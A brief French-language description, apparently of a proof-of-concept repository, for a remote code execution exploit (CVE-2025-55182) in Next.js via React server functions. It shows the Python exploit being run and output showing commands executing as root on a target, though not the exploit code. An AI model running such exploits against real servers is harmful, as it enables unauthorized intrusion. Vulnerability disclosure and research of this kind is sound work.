
Exploit de preuve de concept pour CVE-2025-55182 permettant l'exécution de code à distance dans Next.js via les fonctions serveur React. Inclut un script Python qui démontre l'injection de commandes et renvoie la sortie au niveau système.
Next.js RCE via les fonctions serveur React
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}